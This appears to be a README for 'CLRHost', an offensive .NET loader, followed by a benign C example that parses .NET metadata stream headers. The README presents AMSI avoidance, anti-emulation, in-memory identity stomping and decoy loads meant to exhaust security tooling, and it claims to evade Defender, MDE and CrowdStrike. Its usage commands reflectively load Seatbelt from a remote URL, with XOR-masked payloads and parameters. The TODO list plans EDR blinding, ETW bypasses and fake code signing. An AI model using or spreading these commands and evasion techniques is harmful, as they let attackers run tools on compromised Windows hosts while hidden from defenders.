Documentation and usage are coming (grep around for params). Leverages the load_2 overload for the deprecated CorRuntime interface to avoid loading AMSI, per https://github.com/passthehashbrowns/Being-A-Good-CLR-Host. Comes with some shitty guard rails and anti-emulation, as well as a native .NET Data Directory metadata parser for lazy identity stomping.

Clears Defender, MDE and CrowdStrike at the time of writing.
Load an assembly from disk:

```
CLRHost.exe -d -a C:\Windows\Temp\benign.exe
```
Exhaust EDR/AV attention by loading an embedded benign binary (requires baking in an RCDATA resource pointing to an assembly). The appropriate --exhaust params can also be set to point it at an assembly on disk or reflectively loaded from the web:

```
CLRHost.exe -d -a C:\Windows\Temp\benign.exe --exhaust-embedded
```
List the methods in an assembly:

```
CLRHost.exe -d -a C:\Windows\Temp\benign.exe --list-methods
```
Reflectively load from the web with an argument string and stomp the identity in memory:

```
CLRHost.exe -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity
```
Same as above, but for an XOR-encoded (repeating mask) payload:

```
CLRHost.exe --xor --key some_key_here -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity
```
Same as above, but the params are masked as well:

```
CLRHost.exe --param-xor --param-key testmask --xor --key testmask -w -a HBEHBB5bXEQTDAccGANdCBsIXDIBAB0MAgwYWz4JEhkEJhwYAQQQHx0KHVsfAAREBgAVB0IJFgoQFlwZDBIHDgZKPREZJwEKGQAEGx8KLF9aVSwMW1VcOBEEBxYIDQdFER0W --verbose -p OAoQFQE0AA4GFg== --stomp-identity
```
- better parameter parsing to allow calling methods that take non-string-array arguments when using --invoke-member
- interactive mode so that the AppDomain doesn't get torn down and we can keep loading stuff; could be useful for loading system GAC assemblies and then manipulating them, à la PowerShell .NET tradecraft
- add optional compile-time includes for EDR blinding (loud ones and softer ones like WFP abuse), patchless ETW bypasses, etc.
- verify and fix some probable index-width sizing errors in the metadata stream parsing used when ID stomping
- if I'm bothered, migrate it out to classes so it's not an unmaintainable codebase monster
- fake-sign the binary?
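The native metadata parser mentioned in the feature list and the index-width item in the TODO list, as an added example that is not CLRHost's own code: a bounds-checked parser for the ECMA-335 metadata root that walks the stream headers, locates the #~ tables stream and reads its HeapSizes byte, whose bits 0-2 decide whether the #Strings, #GUID and #Blob indices are 2 or 4 bytes wide (the widths the TODO item refers to). The metadata bytes are constructed inline, not taken from a real assembly.

```c
#include <stdint.h>
#include <string.h>

/* Constructed sample: a metadata root with a "#~" stream (HeapSizes 0x05) and a tiny "#Strings" heap. */
static const uint8_t SAMPLE_METADATA[] = {
    0x42,0x53,0x4A,0x42, 0x01,0x00, 0x01,0x00, 0x00,0x00,0x00,0x00,      /* "BSJB", v1.1, reserved */
    0x0C,0x00,0x00,0x00, 'v','4','.','0','.','3','0','3','1','9',0,0,     /* version length + string */
    0x00,0x00, 0x02,0x00,                                                /* flags, 2 streams */
    0x40,0x00,0x00,0x00, 0x1C,0x00,0x00,0x00, '#','~',0,0,               /* "#~" @64, 28 bytes */
    0x5C,0x00,0x00,0x00, 0x08,0x00,0x00,0x00, '#','S','t','r','i','n','g','s',0,0,0,0,
    0x00,0x00,0x00,0x00, 0x02,0x00, 0x05, 0x01,                          /* #~: reserved, v2.0, HeapSizes, reserved */
    0x01,0,0,0,0,0,0,0,  0x01,0,0,0,0,0,0,0,  0x01,0x00,0x00,0x00,       /* Valid, Sorted, Rows[Module]=1 */
    0,'F','o','o',0,0,0,0                                                /* #Strings heap */
};

typedef struct {
    uint32_t stream_count, tables_offset, tables_size;
    uint8_t  heap_sizes;                      /* HeapSizes byte of the #~ header */
    unsigned string_idx, guid_idx, blob_idx;  /* index widths (2 or 4) into each heap */
} md_info_t;

static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* Finds "#~" (or the uncompressed "#-") among the stream headers and derives the heap index
 * widths from HeapSizes. Every read is bounds-checked; returns 0 on success, -1 if malformed. */
int parse_metadata(const uint8_t *md, size_t len, md_info_t *out) {
    memset(out, 0, sizeof *out);
    if (len < 32 || rd32(md) != 0x424A5342) return -1;          /* "BSJB" signature */
    uint32_t verlen = rd32(md + 12);
    size_t pos = 16 + verlen;                                    /* skip padded version string */
    if (verlen > len || pos + 4 > len) return -1;
    out->stream_count = rd16(md + pos + 2);
    pos += 4;
    for (uint32_t i = 0; i < out->stream_count; i++) {
        if (pos + 8 > len) return -1;
        size_t nlen = 0; while (pos + 8 + nlen < len && md[pos + 8 + nlen] != 0) nlen++;
        if (pos + 8 + nlen >= len) return -1;                    /* unterminated stream name */
        const char *name = (const char *)md + pos + 8;
        if (!strcmp(name, "#~") || !strcmp(name, "#-")) { out->tables_offset = rd32(md + pos); out->tables_size = rd32(md + pos + 4); }
        pos += 8 + ((nlen + 1 + 3) & ~(size_t)3);                /* name is NUL-padded to 4 bytes */
    }
    if (out->tables_size < 24 || out->tables_offset > len - 24) return -1;
    out->heap_sizes = md[out->tables_offset + 6];
    out->string_idx = (out->heap_sizes & 0x01) ? 4 : 2;          /* bit 0: #Strings index width */
    out->guid_idx   = (out->heap_sizes & 0x02) ? 4 : 2;          /* bit 1: #GUID index width */
    out->blob_idx   = (out->heap_sizes & 0x04) ? 4 : 2;          /* bit 2: #Blob index width */
    return 0;
}
```

Any table row that carries a string, GUID or blob index must be sized with these widths before the row can be walked or rewritten; reading them as fixed 2-byte values is exactly where a parser silently drifts.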